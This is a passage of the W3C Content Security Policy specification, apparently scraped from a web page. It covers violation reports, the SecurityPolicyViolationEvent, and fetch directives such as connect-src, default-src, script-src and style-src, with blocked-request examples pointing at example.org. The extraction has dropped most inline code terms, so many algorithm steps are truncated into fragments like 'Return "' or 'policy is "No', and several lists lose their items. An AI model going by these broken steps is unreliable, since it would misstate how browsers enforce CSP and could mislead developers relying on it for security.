violationās status
- "
" -
violationās sample
Note: The name
was chosen for compatibility with an earlier iteration of this feature which has shipped in Firefox since its initial implementation of CSP. Despite the name, this field will contain samples for non-script violations, like stylesheets. The data contained in aSecurityPolicyViolationEvent
object, and in reports generated via the newreport-to
directive, is named in a more encompassing fashion:sample
- "
If violationās source file is not
Set body["
'] to the result of executing Ā§āÆ5.4 Strip URL for use in reports on violationās source file. -
Set body["
"] to violationās line number. -
Set body["
"] to violationās column number.
Assert: If body["
"] is not "inline
", then body["sample
"] is the empty string. -
Return the result of serialize an infra value to JSON bytes given Ā«[ "csp-report" ā body ]Ā».
5.4. Strip URL for use in reports
Given a URL (url), this algorithm returns a string representing the URL for use in violation reports:-
If urlās scheme is not an HTTP(S) scheme, then return urlās scheme.
Set urlās fragment to the empty string.
Set urlās username to the empty string.
Set urlās password to the empty string.
Return the result of executing the URL serializer on url.
5.5. Report a violation
Given a violation (violation), this algorithm reports it to the endpoint specified in violationās policy, and fires a SecurityPolicyViolationEvent
at violationās element, or at violationās global object as described below:
Let global be violationās global object.
Let target be violationās element.
Queue a task to run the following steps:
Note: We "queue a task" here to ensure that the event targeting and dispatch happens after JavaScript completes execution of the task responsible for a given violation (which might manipulate the DOM).
If target is not
, and global is aWindow
, and targetās shadow-including root is not globalās associatedDocument
, set target tonull
.Note: This ensures that we fire events only at elements connected to violationās policyās
. If a violation is caused by an element which isnāt connected to that document, weāll fire the event at the document rather than the element in order to ensure that the violation is visible to the documentās listeners. -
If target is
Set target to violationās global object.
If target is a
, set target to targetās associatedDocument
If target implements
, fire an event namedsecuritypolicyviolation
that uses theSecurityPolicyViolationEvent
interface at target with its attributes initialized as follows:documentURI
The result of executing Ā§āÆ5.4 Strip URL for use in reports on violationās url.
The result of executing Ā§āÆ5.4 Strip URL for use in reports on violationās referrer.
The result of executing Ā§āÆ5.2 Obtain the blockedURI of a violationās resource on violationās resource.
violationās effective directive
violationās effective directive
The serialization of violationās policy
violationās disposition
The result of executing Ā§āÆ5.4 Strip URL for use in reports on violationās source file, if violationās source file is not null, or null otherwise.
violationās status
violationās line number
violationās column number
violationās sample
Note: We set the
attribute, which means that this event can be captured on its way into, and will bubble its way out of a shadow tree.target
, et al will be automagically scoped correctly for the main tree.Note: Both
are the same value. This is intentional to maintain backwards compatibility. -
If violationās policyās directive set contains a directive named "
" (directive):-
If violationās policyās directive set contains a directive named "
", skip the remaining substeps. -
For each token of directiveās value:
Let endpoint be the result of executing the URL parser with token as the input, and violationās url as the base URL.
If endpoint is not a valid URL, skip the remaining substeps.
Let request be a new request, initialized as follows:
- method
" - url
violationās url
- origin
violationās global objectās relevant settings objectās origin
- window
" - client
violationās global objectās relevant settings object
- destination
" - initiator
- credentials mode
" - keepalive
" - header list
A header list containing a single header whose name is "
", and value is "application/csp-report
" - body
The result of executing Ā§āÆ5.3 Obtain the deprecated serialization of violation on violation
- redirect mode
Note: requestās mode defaults to "
"; the response is ignored entirely. -
Fetch request. The result will be ignored.
Note: All of this should be considered deprecated. It sends a single request per violation, which simply isnāt scalable. As soon as this behavior can be removed from user agents, it will be.
only takes effect ifreport-to
is not present. That is, the latter overrides the former, allowing for backwards compatibility with browsers that donāt support the new mechanism. -
If violationās policyās directive set contains a directive named "
" (directive):-
Let body be a new
, initialized as follows:documentURL
The result of executing Ā§āÆ5.4 Strip URL for use in reports on violationās url.
The result of executing Ā§āÆ5.4 Strip URL for use in reports on violationās referrer.
The result of executing Ā§āÆ5.2 Obtain the blockedURI of a violationās resource on violationās resource.
violationās effective directive.
The serialization of violationās policy.
The result of executing Ā§āÆ5.4 Strip URL for use in reports on violationās source file, if violationās source file is not null, or null otherwise.
violationās sample.
violationās disposition.
violationās status.
violationās line number, if violationās source file is not null, or null otherwise.
violationās column number, if violationās source file is not null, or null otherwise.
Let settings object be violationās global objectās relevant settings object.
Generate and queue a report with the following arguments:
- context
settings object
- type
- destination
directiveās value.
- data
6. Content Security Policy Directives
This specification defines a number of types of directives which allow developers to control certain aspects of their sites' behavior. This document defines directives which govern resource fetching (in Ā§āÆ6.1 Fetch Directives), directives which govern the state of a document (in Ā§āÆ6.3 Document Directives), directives which govern aspects of navigation (in Ā§āÆ6.4 Navigation Directives), and directives which govern reporting (in Ā§āÆ6.5 Reporting Directives). These form the core of Content Security Policy; other directives are defined in a modular fashion in ancillary documents (see Ā§āÆ6.6 Directives Defined in Other Documents for examples).
To mitigate the risk of cross-site scripting attacks, web developers SHOULD include directives that regulate sources of script and plugins. They can do so by including:
Both the script-src and object-src directives, or
a default-src directive
In either case, developers SHOULD NOT include either 'unsafe-inline'
, or data:
as valid
sources in their policies. Both enable XSS attacks by allowing code to be
included directly in the document itself; they are best avoided completely.
6.1. Fetch Directives
Fetch directives control the locations from which certain resource types may be loaded. For instance, script-src allows developers to allow trusted sources of script to execute on a page, while font-src controls the sources of web fonts.
6.1.1. child-src
The child-src
directive governs the creation of child
navigables (e.g. iframe
and frame
navigations) and Worker execution
contexts. The syntax for the directiveās name and value is described by the
following ABNF:
directive-name = "child-src" directive-value = serialized-source-list
This directive controls requests which will populate a frame or a worker. More formally, requests falling into one of the following categories:
destination is "
", "iframe
", "object
", or "embed
". -
destination is either "
", "sharedworker
", or "worker
" (which are fed to the run a worker algorithm forServiceWorker
, andWorker
, respectively).
Content-Security-Policy: child-src https://example.com/
Fetches for the following code will all return network errors, as the URLs
provided do not match child-src
's source list:
< iframe src = "https://example.org" ></ iframe > < script > var blockedWorker= new Worker( "data:application/javascript,..." ); </ script > child-src
Pre-request check
This directiveās pre-request check is as follows:
Given a request (request) and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
Return the result of executing the pre-request check for the directive whose name is name on request and policy, using this directiveās value for the comparison. child-src
Post-request check
This directiveās post-request check is as follows:
Given a request (request), a response (response), and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
Return the result of executing the post-request check for the directive whose name is name on request, response, and policy, using this directiveās value for the comparison.
6.1.2. connect-src
The connect-src directive restricts the URLs which can be loaded using script interfaces. The syntax for the directiveās name and value is described by the following ABNF:
directive-name = "connect-src" directive-value = serialized-source-list
This directive controls requests which transmit or receive data from
other origins. This includes APIs like fetch()
's ping
. This directive also controls
WebSocket [WEBSOCKETS] connections, though those arenāt technically part
of Fetch.
maintains an open
HTTP connection to a server in order to receive push notifications, WebSockets
open a bidirectional communication channel between your
browser and a server, and XMLHttpRequest
makes arbitrary HTTP requests
on your behalf. These are powerful APIs that enable useful functionality,
but also provide tempting avenues for data exfiltration.
The connect-src
directive allows you to ensure that these and similar
sorts of connections are only opened to origins you trust. Sending a
policy that defines a list of source expressions for this directive is
straightforward. For example, to limit connections to only https://example.com
, send the following header:
Content-Security-Policy: connect-src https://example.com/
Fetches for the following code will all return network errors, as the URLs
provided do not match connect-src
's source list:
< a ping = "https://example.org" > ...< script > var xhr= new XMLHttpRequest(); xhr. open( 'GET' , 'https://example.org/' ); xhr. send(); var ws= new WebSocket( "wss://example.org/" ); var es= new EventSource( "https://example.org/" ); navigator. sendBeacon( "https://example.org/" , { ... }); </ script > connect-src
Pre-request check
This directiveās pre-request check is as follows:
Given a request (request) and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.3 Does request match source list? on request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
". connect-src
Post-request check
This directiveās post-request check is as follows:
Given a request (request), a response (response), and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.4 Does response to request match source list? on response, request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
6.1.3. default-src
The default-src directive serves as a fallback for the other fetch directives. The syntax for the directiveās name and value is described by the following ABNF:
directive-name = "default-src" directive-value = serialized-source-list
If a default-src directive is present in a policy, its value will be
used as the policyās default source list. That is, given default-src 'none'; script-src 'self'
, script requests will use 'self'
as the source
list to match against. Other requests will use 'none'
. This is spelled
out in more detail in the Ā§āÆ4.1.2 Should request be blocked by Content Security Policy? and Ā§āÆ4.1.3 Should response to request be blocked by Content Security Policy? algorithms.
Content-Security-Policy: default-src 'self'
will have the same behavior as the following header:
Content-Security-Policy: connect-src 'self'; font-src 'self'; frame-src 'self'; img-src 'self'; manifest-src 'self'; media-src 'self'; prefetch-src 'self'; object-src 'self'; script-src-elem 'self'; script-src-attr 'self'; style-src-elem 'self'; style-src-attr 'self'; worker-src 'self'
That is, when default-src
is set, every fetch directive that isnāt
explicitly set will fall back to the value default-src
directive is explicitly
specified, for example, then the value of default-src
has no influence on
script requests. That is, the following header:
Content-Security-Policy: default-src 'self'; script-src-elem https://example.com
will have the same behavior as the following header:
Content-Security-Policy: connect-src 'self'; font-src 'self'; frame-src 'self'; img-src 'self'; manifest-src 'self'; media-src 'self'; prefetch-src 'self'; object-src 'self'; script-src-elem https://example.com; script-src-attr 'self'; style-src-elem 'self'; style-src-attr 'self'; worker-src 'self'
Given this behavior, one good way to build a policy for a site would be to
begin with a default-src
of 'none'
, and to build up a policy from there
which allowed only those resource types which are necessary for the
particular page the policy will apply to. default-src
Pre-request check
This directiveās pre-request check is as follows:
Given a request (request) and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
Return the result of executing the pre-request check for the directive whose name is name on request and policy, using this directiveās value for the comparison. default-src
Post-request check
This directiveās post-request check is as follows:
Given a request (request), a response (response), and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
Return the result of executing the post-request check for the directive whose name is name on request, response, and policy, using this directiveās value for the comparison. default-src
Inline Check
This directiveās inline check algorithm is as follows:
Given an Element
(element), a string (type), a policy (policy) and a string (source):
Let name be the result of executing Ā§āÆ6.8.2 Get the effective directive for inline checks on type.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
Otherwise, return the result of executing the inline check for the directive whose name is name on element, type, policy and source, using this directiveās value for the comparison.
6.1.4. font-src
The font-src directive restricts the URLs from which font resources may be loaded. The syntax for the directiveās name and value is described by the following ABNF:
directive-name = "font-src" directive-value = serialized-source-list
Content-Security-Policy: font-src https://example.com/
Fetches for the following code will return a network errors, as the URL
provided do not match font-src
's source list:
< style > @ font-face { font-family : "Example Font" ; src : url ( "https://example.org/font" ); } body { font-family : "Example Font" ; } </ style > font-src
Pre-request check
This directiveās pre-request check is as follows:
Given a request (request) and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.3 Does request match source list? on request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
". font-src
Post-request check
This directiveās post-request check is as follows:
Given a request (request), a response (response), and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.4 Does response to request match source list? on response, request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
6.1.5. frame-src
The frame-src directive restricts the URLs which may be loaded into child navigables. The syntax for the directiveās name and value is described by the following ABNF:
directive-name = "frame-src" directive-value = serialized-source-list
Content-Security-Policy: frame-src https://example.com/
Fetches for the following code will return a network errors, as the URL
provided do not match frame-src
's source list:
< iframe src = "https://example.org/" > </ iframe > frame-src
Pre-request check
This directiveās pre-request check is as follows:
Given a request (request) and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.3 Does request match source list? on request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
". frame-src
Post-request check
This directiveās post-request check is as follows:
Given a request (request), a response (response), and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.4 Does response to request match source list? on response, request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
6.1.6. img-src
The img-src directive restricts the URLs from which image resources may be loaded. The syntax for the directiveās name and value is described by the following ABNF:
directive-name = "img-src" directive-value = serialized-source-list
This directive controls requests which load images. More formally, this
includes requests whose destination is "image
" [FETCH].
Content-Security-Policy: img-src https://example.com/
Fetches for the following code will return a network errors, as the URL
provided do not match img-src
's source list:
< img src = "https://example.org/img" > img-src
Pre-request check
This directiveās pre-request check is as follows:
Given a request (request) and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.3 Does request match source list? on request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
". img-src
Post-request check
This directiveās post-request check is as follows:
Given a request (request), a response (response), and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.4 Does response to request match source list? on response, request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
6.1.7. manifest-src
The manifest-src directive restricts the URLs from which application manifests may be loaded [APPMANIFEST]. The syntax for the directiveās name and value is described by the following ABNF:
directive-name = "manifest-src" directive-value = serialized-source-list
Content-Security-Policy: manifest-src https://example.com/
Fetches for the following code will return a network errors, as the URL
provided do not match manifest-src
's source list:
< link rel = "manifest" href = "https://example.org/manifest" > manifest-src
Pre-request check
This directiveās pre-request check is as follows:
Given a request (request) and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.3 Does request match source list? on request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
". manifest-src
Post-request check
This directiveās post-request check is as follows:
Given a request (request), a response (response), and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.4 Does response to request match source list? on response, request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
6.1.8. media-src
The media-src directive restricts the URLs from which video, audio, and associated text track resources may be loaded. The syntax for the directiveās name and value is described by the following ABNF:
directive-name = "media-src" directive-value = serialized-source-list
Content-Security-Policy: media-src https://example.com/
Fetches for the following code will return a network errors, as the URL
provided do not match media-src
's source list:
< audio src = "https://example.org/audio" ></ audio > < video src = "https://example.org/video" > < track kind = "subtitles" src = "https://example.org/subtitles" > </ video > media-src
Pre-request check
This directiveās pre-request check is as follows:
Given a request (request) and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.3 Does request match source list? on request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
". media-src
Post-request check
This directiveās post-request check is as follows:
Given a request (request), a response (response), and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.4 Does response to request match source list? on response, request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
6.1.9. object-src
The object-src directive restricts the URLs from which plugin content may be loaded. The syntax for the directiveās name and value is described by the following ABNF:
directive-name = "object-src" directive-value = serialized-source-list
Content-Security-Policy: object-src https://example.com/
Fetches for the following code will return a network errors, as the URL
provided do not match object-src
's source list:
< embed src = "https://example.org/flash" ></ embed > < object data = "https://example.org/flash" ></ object >
If plugin content is loaded without an associated URL (perhaps an object
element lacks a data
attribute, but loads some default plugin based
on the specified type
), it MUST be blocked if object-src
's value is 'none'
, but will otherwise be allowed.
Note: The object-src
directive acts upon any request made on behalf of
an object
or embed
element. This includes requests
which would populate the child navigable generated by the
former two (also including navigations). This is true even when the data is
semantically equivalent to content which would otherwise be restricted by
another directive, such as an object
element with a text/html
Note: When a plugin resource is navigated to directly (that is, as a plugin inside a navigable, and not as an embedded
subresource via embed
or object
), any policy delivered along
with that resource will be applied to the resulting document. This means, for instance, that
developers can prevent the execution of arbitrary resources as plugin content by delivering the
policy object-src 'none'
along with a response. Given plugins' power (and the
sometimes-interesting security model presented by Flash and others), this could mitigate the risk
of attack vectors like Rosetta Flash. object-src
Pre-request check
This directiveās pre-request check is as follows:
Given a request (request) and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.3 Does request match source list? on request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
". object-src
Post-request check
This directiveās post-request check is as follows:
Given a request (request), a response (response), and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.4 Does response to request match source list? on response, request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
6.1.10. prefetch-src
The prefetch-src directive restricts the URLs from which resources may be prefetched or prerendered. The syntax for the directiveās name and value is described by the following ABNF:
directive-name = "prefetch-src" directive-value = serialized-source-list
Content-Security-Policy: prefetch-src https://example.com/
Fetches for the following code will return network errors, as the URLs provided do not match prefetch-src
's source list:
< link rel = "prefetch" src = "https://example.org/" ></ link > < link rel = "prerender" src = "https://example.org/" ></ link > prefetch-src
Pre-request check
This directiveās pre-request check is as follows:
Given a request (request) and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.3 Does request match source list? on request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
". prefetch-src
Post-request check
This directiveās post-request check is as follows:
Given a request (request), a response (response), and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.4 Does response to request match source list? on response, request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
6.1.11. script-src
The script-src directive restricts the locations from which scripts
may be executed. This includes not only URLs loaded directly into script
elements, but also things like inline script blocks and XSLT stylesheets [XSLT] which can trigger script execution. The syntax for the directiveās
name and value is described by the following ABNF:
directive-name = "script-src" directive-value = serialized-source-list
The script-src
directive acts as a default fallback for all script-like destinations (including worker-specific destinations if worker-src
is not present). Unless granularity is desired script-src
be used in favor of script-src-attr
and script-src-elem
as in most situations there is no particular reason to have separate lists of
permissions for inline event handlers and script
The script-src
directive governs six things:
Script requests MUST pass through Ā§āÆ4.1.2 Should request be blocked by Content Security Policy?.
Script responses MUST pass through Ā§āÆ4.1.3 Should response to request be blocked by Content Security Policy?.
blocks MUST pass through Ā§āÆ4.2.3 Should elementās inline type behavior be blocked by Content Security Policy?. Their behavior will be blocked unless every policy allows inline script, either implicitly by not specifying ascript-src
) directive, or explicitly, by specifying "unsafe-inline
", a nonce-source or a hash-source that matches the inline block. -
The following JavaScript execution sinks are gated on the "
" source expression:-
with an initial argument which is not callable. -
with an initial argument which is not callable.
Note: If a user agent implements non-standard sinks like
, they SHOULD also be gated on "unsafe-eval
". Note: Since "unsafe-eval
" acts as a global page flag,script-src-attr
are not used when performing this check, insteadscript-src
(or itās fallback directive) is always used. -
The following WebAssembly execution sinks are gated on the "
" or the "unsafe-eval
" source expressions:Note: the "
" source expression is the more specific source expression. In particular, "unsafe-eval
" permits both compilation (and instantiation) of WebAssembly and, for example, the use of the "eval
" operation in JavaScript. The "wasm-unsafe-eval
" source expression only permits WebAssembly and does not affect JavaScript. -
Navigation to
URLs MUST pass through Ā§āÆ4.2.3 Should elementās inline type behavior be blocked by Content Security Policy?. Such navigations will only execute script if every policy allows inline script, as per #3 above. script-src
Pre-request check
This directiveās pre-request check is as follows:
Given a request (request) and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
Return the result of executing Ā§āÆ6.7.1.1 Script directives pre-request check on request, this directive, and policy. script-src
Post-request check
This directiveās post-request check is as follows:
Given a request (request), a response (response), and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
Return the result of executing Ā§āÆ6.7.1.2 Script directives post-request check on request, response, this directive, and policy. script-src
Inline Check
This directiveās inline check algorithm is as follows:
Given an Element
(element), a string (type), a policy (policy) and a string (source):
Assert: element is not
or type is "navigation
". -
Let name be the result of executing Ā§āÆ6.8.2 Get the effective directive for inline checks on type.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.3.3 Does element match source list for type and source? on element, this directiveās value, type, and source, is "
Does Not Match
", return "Blocked
". -
Return "
6.1.12. script-src-elem
The syntax for the directiveās name and value is described by the following ABNF:
directive-name = "script-src-elem" directive-value = serialized-source-list
The script-src-elem directive applies to all script requests and
script blocks. Attributes that execute script (inline event handlers) are
controlled via script-src-attr
As such, the following differences exist when comparing to script-src
applies to inline checks whose|type|
is "script
" and "navigation
" (and is ignored for inline checks whose|type|
is "script attribute
"). -
's value is not used for JavaScript execution sink checks that are gated on the "unsafe-eval
" check. -
is not used as a fallback for theworker-src
directive. Theworker-src
checks still fall back on thescript-src
directive. script-src-elem
Pre-request check
This directiveās pre-request check is as follows:
Given a request (request) and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
Return the result of executing Ā§āÆ6.7.1.1 Script directives pre-request check on request, this directive, and policy. script-src-elem
Post-request check
This directiveās post-request check is as follows:
Given a request (request), a response (response), and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
Return the result of executing Ā§āÆ6.7.1.2 Script directives post-request check on request, response, this directive, and policy. script-src-elem
Inline Check
This directiveās inline check algorithm is as follows:
Given an Element
(element), a string (type), a policy (policy) and a string (source):
Assert: element is not
or type is "navigation
". -
Let name be the result of executing Ā§āÆ6.8.2 Get the effective directive for inline checks on type.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
, and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.3.3 Does element match source list for type and source? on element, this directiveās value, type, and source is "
Does Not Match
", return "Blocked
". -
Return "
6.1.13. script-src-attr
The syntax for the directiveās name and value is described by the following ABNF:
directive-name = "script-src-attr" directive-value = serialized-source-list
The script-src-attr directive applies to event handlers and, if present,
it will override the script-src
directive for relevant checks. script-src-attr
Inline Check
This directiveās inline check algorithm is as follows:
Given an Element
(element), a string (type), a policy (policy) and a string (source):
Assert: element is not
or type is "navigation
". -
Let name be the result of executing Ā§āÆ6.8.2 Get the effective directive for inline checks on type.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.3.3 Does element match source list for type and source? on element, this directiveās value, type, and source, is "
Does Not Match
", return "Blocked
". -
Return "
6.1.14. style-src
The style-src directive restricts the locations from which style
may be applied to a Document
. The syntax for the directiveās name and
value is described by the following ABNF:
directive-name = "style-src" directive-value = serialized-source-list
The style-src
directive governs several things:
Style requests MUST pass through Ā§āÆ4.1.2 Should request be blocked by Content Security Policy?. This includes:
Responses to style requests MUST pass through Ā§āÆ4.1.3 Should response to request be blocked by Content Security Policy?.
blocks MUST pass through Ā§āÆ4.2.3 Should elementās inline type behavior be blocked by Content Security Policy?. The styles will be blocked unless every policy allows inline style, either implicitly by not specifying astyle-src
) directive, or explicitly, by specifying "unsafe-inline
", a nonce-source or a hash-source that matches the inline block. -
The following CSS algorithms are gated on the
source expression:This would include, for example, all invocations of CSSOMās various
setters andinsertRule
methods [CSSOM] [HTML].This needs to be better explained. [Issue #w3c/webappsec-csp#212] style-src
Pre-request Check
This directiveās pre-request check is as follows:
Given a request (request) and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.2 Does nonce match source list? on requestās cryptographic nonce metadata and this directiveās value is "
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.3 Does request match source list? on request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
". style-src
Post-request Check
This directiveās post-request check is as follows:
Given a request (request), a response (response), and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.2 Does nonce match source list? on requestās cryptographic nonce metadata and this directiveās value is "
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.4 Does response to request match source list? on response, request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
". style-src
Inline Check
This directiveās inline check algorithm is as follows:
Given an Element
(element), a string (type), a policy (policy) and a string (source):
Let name be the result of executing Ā§āÆ6.8.2 Get the effective directive for inline checks on type.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.3.3 Does element match source list for type and source? on element, this directiveās value, type, and source, is "
Does Not Match
", return "Blocked
". -
Return "
This directiveās initialization algorithm is as follows:
Do something interesting to the execution context in order to lock down interesting CSSOM algorithms. I donāt think CSSOM gives us any hooks here, so letās work with them to put something reasonable together.
6.1.15. style-src-elem
The syntax for the directiveās name and value is described by the following ABNF:
directive-name = "style-src-elem" directive-value = serialized-source-list
The style-src-elem directive governs the behaviour of styles except for styles defined in inline attributes. style-src-elem
Pre-request Check
This directiveās pre-request check is as follows:
Given a request (request) and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.2 Does nonce match source list? on requestās cryptographic nonce metadata and this directiveās value is "
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.3 Does request match source list? on request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
". style-src-elem
Post-request Check
This directiveās post-request check is as follows:
Given a request (request), a response (response), and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.2 Does nonce match source list? on requestās cryptographic nonce metadata and this directiveās value is "
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.4 Does response to request match source list? on response, request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
". style-src-elem
Inline Check
This directiveās inline check algorithm is as follows:
Given an Element
(element), a string (type), a policy (policy) and a string (source):
Let name be the result of executing Ā§āÆ6.8.2 Get the effective directive for inline checks on type.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.3.3 Does element match source list for type and source? on element, this directiveās value, type, and source, is "
Does Not Match
", return "Blocked
". -
Return "
6.1.16. style-src-attr
The syntax for the directiveās name and value is described by the following ABNF:
directive-name = "style-src-attr" directive-value = serialized-source-list
The style-src-attr directive governs the behaviour of style attributes. style-src-attr
Inline Check
This directiveās inline check algorithm is as follows:
Given an Element
(element), a string (type), a policy (policy) and a string (source):
Let name be the result of executing Ā§āÆ6.8.2 Get the effective directive for inline checks on type.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.3.3 Does element match source list for type and source? on element, this directiveās value, type, and source, is "
Does Not Match
", return "Blocked
". -
Return "
